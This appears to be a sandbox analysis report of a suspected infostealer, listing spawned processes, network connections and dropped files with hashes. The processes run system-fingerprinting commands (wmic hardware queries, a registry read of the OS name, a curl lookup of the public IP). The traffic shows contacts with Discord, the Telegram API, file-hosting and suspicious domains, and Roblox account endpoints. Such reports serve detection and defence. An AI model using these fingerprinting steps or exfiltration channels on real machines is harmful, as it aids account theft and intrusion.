"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3560 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4496 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4636 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4748 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4844 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4712 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4908 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffed84746f8,0x7ffed8474708,0x7ffed8474718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed84746f8,0x7ffed8474708,0x7ffed8474718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2008 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=2136 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6116 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6128 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4704 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2916 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:80 api.ipify.org tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
US 162.159.138.232:443 discord.com tcp
US 104.26.13.205:80 api.ipify.org tcp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.171:443 www.bing.com tcp
US 104.26.13.205:80 api.ipify.org tcp
US 8.8.8.8:53 171.61.62.23.in-addr.arpa udp
US 104.26.13.205:80 api.ipify.org tcp
US 8.8.8.8:53 api.filedoge.com udp
DE 49.13.193.134:443 api.filedoge.com tcp
US 8.8.8.8:53 134.193.13.49.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 106.90.14.23.in-addr.arpa udp
US 104.26.13.205:80 api.ipify.org tcp
US 8.8.8.8:53 www.myexternalip.com udp
US 34.117.118.44:443 www.myexternalip.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 mrbfederali.cam udp
US 104.21.93.60:443 mrbfederali.cam tcp
US 8.8.8.8:53 44.118.117.34.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 60.93.21.104.in-addr.arpa udp
US 104.26.13.205:80 api.ipify.org tcp
US 162.159.138.232:443 discord.com tcp
US 104.26.13.205:80 api.ipify.org tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 106.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.187.206:443 apis.google.com udp
US 104.26.13.205:80 api.ipify.org tcp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.46:443 play.google.com udp
US 104.26.13.205:80 api.ipify.org tcp
US 8.8.8.8:53 46.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 216.58.213.14:443 clients2.google.com udp
GB 216.58.213.14:443 clients2.google.com tcp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
NL 23.62.61.155:443 www.bing.com tcp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 155.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 roblox.com udp
FR 128.116.122.4:443 roblox.com tcp
FR 128.116.122.4:443 roblox.com tcp
US 8.8.8.8:53 www.roblox.com udp
DE 128.116.44.4:443 www.roblox.com tcp
US 8.8.8.8:53 css.rbxcdn.com udp
US 8.8.8.8:53 static.rbxcdn.com udp
US 8.8.8.8:53 js.rbxcdn.com udp
BE 23.14.90.112:443 css.rbxcdn.com tcp
BE 23.14.90.112:443 css.rbxcdn.com tcp
BE 23.14.90.112:443 css.rbxcdn.com tcp
BE 23.14.90.112:443 css.rbxcdn.com tcp
BE 23.14.90.112:443 css.rbxcdn.com tcp
BE 23.14.90.112:443 css.rbxcdn.com tcp
DE 18.173.154.19:443 static.rbxcdn.com tcp
BE 23.14.90.98:443 js.rbxcdn.com tcp
BE 23.14.90.98:443 js.rbxcdn.com tcp
BE 23.14.90.98:443 js.rbxcdn.com tcp
BE 23.14.90.98:443 js.rbxcdn.com tcp
BE 23.14.90.98:443 js.rbxcdn.com tcp
BE 23.14.90.98:443 js.rbxcdn.com tcp
US 8.8.8.8:53 4.122.116.128.in-addr.arpa udp
US 8.8.8.8:53 4.44.116.128.in-addr.arpa udp
US 8.8.8.8:53 112.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 19.154.173.18.in-addr.arpa udp
US 8.8.8.8:53 98.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 84.192.66.18.in-addr.arpa udp
DE 128.116.44.4:443 www.roblox.com udp
US 8.8.8.8:53 metrics.roblox.com udp
US 8.8.8.8:53 apis.roblox.com udp
US 8.8.8.8:53 roblox-api.arkoselabs.com udp
DE 128.116.44.4:443 apis.roblox.com tcp
NL 18.239.50.59:443 roblox-api.arkoselabs.com tcp
DE 128.116.44.4:443 apis.roblox.com tcp
US 8.8.8.8:53 59.50.239.18.in-addr.arpa udp
DE 128.116.44.4:443 apis.roblox.com udp
US 8.8.8.8:53 locale.roblox.com udp
US 8.8.8.8:53 apis.rbxcdn.com udp
BE 23.14.90.112:443 css.rbxcdn.com tcp
DE 128.116.44.4:443 locale.roblox.com udp
US 8.8.8.8:53 auth.roblox.com udp
BE 23.14.90.81:443 apis.rbxcdn.com tcp
US 8.8.8.8:53 images.rbxcdn.com udp
FR 13.32.145.6:443 images.rbxcdn.com tcp
FR 13.32.145.6:443 images.rbxcdn.com tcp
FR 13.32.145.6:443 images.rbxcdn.com tcp
FR 13.32.145.6:443 images.rbxcdn.com tcp
FR 13.32.145.6:443 images.rbxcdn.com tcp
FR 13.32.145.6:443 images.rbxcdn.com tcp
DE 128.116.44.4:443 auth.roblox.com udp
US 8.8.8.8:53 81.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 6.145.32.13.in-addr.arpa udp
US 8.8.8.8:53 ecsv2.roblox.com udp
DE 128.116.44.4:443 ecsv2.roblox.com udp
DE 128.116.44.4:443 ecsv2.roblox.com udp
US 8.8.8.8:53 assetgame.roblox.com udp
DE 128.116.44.4:443 assetgame.roblox.com udp
US 8.8.8.8:53 ncs.roblox.com udp
DE 128.116.44.4:443 ncs.roblox.com udp
DE 128.116.44.4:443 ncs.roblox.com udp
US 8.8.8.8:53 realtime-signalr.roblox.com udp
US 8.8.8.8:53 lms.roblox.com udp
US 8.8.8.8:53 thumbnails.roblox.com udp
US 8.8.8.8:53 contacts.roblox.com udp
US 8.8.8.8:53 notifications.roblox.com udp
US 8.8.8.8:53 accountsettings.roblox.com udp
US 8.8.8.8:53 economy.roblox.com udp
US 8.8.8.8:53 friends.roblox.com udp
US 8.8.8.8:53 privatemessages.roblox.com udp
US 8.8.8.8:53 trades.roblox.com udp
DE 128.116.44.4:443 trades.roblox.com udp
US 8.8.8.8:53 bom1-128-116-104-4.roblox.com udp
US 8.8.8.8:53 dfw2-128-116-95-3.roblox.com udp
US 8.8.8.8:53 sea1-128-116-115-3.roblox.com udp
US 8.8.8.8:53 sin2-128-116-97-3.roblox.com udp
US 8.8.8.8:53 silver.roblox.com udp
US 8.8.8.8:53 syd1-128-116-51-3.roblox.com udp
US 8.8.8.8:53 fra2-128-116-123-3.roblox.com udp
US 8.8.8.8:53 cdg1-128-116-122-3.roblox.com udp
US 8.8.8.8:53 c0aws.rbxcdn.com udp
US 8.8.8.8:53 aws-eu-west-2a-lms.rbx.com udp
DE 128.116.44.4:443 trades.roblox.com udp
DE 128.116.44.4:443 trades.roblox.com udp
DE 128.116.44.4:443 trades.roblox.com udp
DE 128.116.44.4:443 trades.roblox.com udp
DE 128.116.44.4:443 trades.roblox.com udp
DE 128.116.44.4:443 trades.roblox.com udp
DE 128.116.44.4:443 trades.roblox.com udp
US 128.116.115.3:443 sea1-128-116-115-3.roblox.com tcp
IN 128.116.104.4:443 bom1-128-116-104-4.roblox.com tcp
SG 128.116.97.3:443 sin2-128-116-97-3.roblox.com tcp
AU 128.116.51.3:443 syd1-128-116-51-3.roblox.com tcp
US 128.116.95.3:443 dfw2-128-116-95-3.roblox.com tcp
DE 18.173.187.83:443 c0aws.rbxcdn.com tcp
FR 128.116.122.3:443 cdg1-128-116-122-3.roblox.com tcp
GB 128.116.119.3:443 silver.roblox.com tcp
DE 128.116.123.3:443 fra2-128-116-123-3.roblox.com tcp
GB 18.170.155.214:443 aws-eu-west-2a-lms.rbx.com tcp
US 8.8.8.8:53 tr.rbxcdn.com udp
AU 128.116.51.3:443 syd1-128-116-51-3.roblox.com tcp
SG 128.116.97.3:443 sin2-128-116-97-3.roblox.com tcp
SE 184.31.15.64:443 tr.rbxcdn.com tcp
US 8.8.8.8:53 3.119.116.128.in-addr.arpa udp
US 8.8.8.8:53 214.155.170.18.in-addr.arpa udp
US 8.8.8.8:53 3.122.116.128.in-addr.arpa udp
US 8.8.8.8:53 3.123.116.128.in-addr.arpa udp
US 8.8.8.8:53 83.187.173.18.in-addr.arpa udp
US 8.8.8.8:53 3.95.116.128.in-addr.arpa udp
US 8.8.8.8:53 3.115.116.128.in-addr.arpa udp
US 8.8.8.8:53 4.104.116.128.in-addr.arpa udp
DE 128.116.44.4:443 trades.roblox.com udp
US 8.8.8.8:53 presence.roblox.com udp
DE 128.116.44.4:443 presence.roblox.com udp
US 8.8.8.8:53 64.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 3.51.116.128.in-addr.arpa udp
US 8.8.8.8:53 3.97.116.128.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 216.58.213.3:443 beacons.gcp.gvt2.com tcp
GB 216.58.213.3:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 3.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 93.65.42.20.in-addr.arpa udp
GB 216.58.213.3:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 ecsv2.roblox.com udp
DE 128.116.44.4:443 ecsv2.roblox.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp

Files

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

MD5 66a65322c9d362a23cf3d3f7735d5430
SHA1 ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256 f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA512 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

C:\Users\Admin\AppData\Local\Temp\temp.ps1

MD5 18047e197c6820559730d01035b2955a
SHA1 277179be54bba04c0863aebd496f53b129d47464
SHA256 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3
SHA512 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

memory/116-72-0x00007FFEDEA23000-0x00007FFEDEA25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dw5ramhy.pnl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/116-82-0x000001C9A1560000-0x000001C9A1582000-memory.dmp

memory/116-83-0x00007FFEDEA20000-0x00007FFEDF4E1000-memory.dmp

memory/116-84-0x00007FFEDEA20000-0x00007FFEDF4E1000-memory.dmp

memory/116-85-0x000001C9A38A0000-0x000001C9A38E4000-memory.dmp

memory/116-86-0x000001C9A3CF0000-0x000001C9A3D66000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\coslunty\coslunty.0.cs

MD5 7bc8de6ac8041186ed68c07205656943
SHA1 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75
SHA256 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697
SHA512 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

\??\c:\Users\Admin\AppData\Local\Temp\coslunty\coslunty.cmdline

MD5 5c77a68b2ccfc25f8c61bc3348cbcdc1
SHA1 e57180120e91327949fa4386cf048d763148c9ad
SHA256 e2ad7b057524b385f1f51fafa236638d0901c549d948e6dfcedace534d95a427
SHA512 a3b5c0c0663f5abd4a3f2f5bbcda5e815e4752684a98b1576355175f763b277170ef54615440762b2735e42b56b9e3bdf1245150dc69ddf7d4c96fb1aefa9046

\??\c:\Users\Admin\AppData\Local\Temp\coslunty\CSC49F411F94BF644DD95F3BEBC997E183B.TMP

MD5 545bb7a6e87dfe811fe1ba3801905d1a
SHA1 fcf7338e3f75bcebe77945bffbdf6d82c0b1575a
SHA256 a5ae48e6f6c24db7f97a71f235933d821a3b42a6d9fb973ea8eb5ea1a6e2a0c9
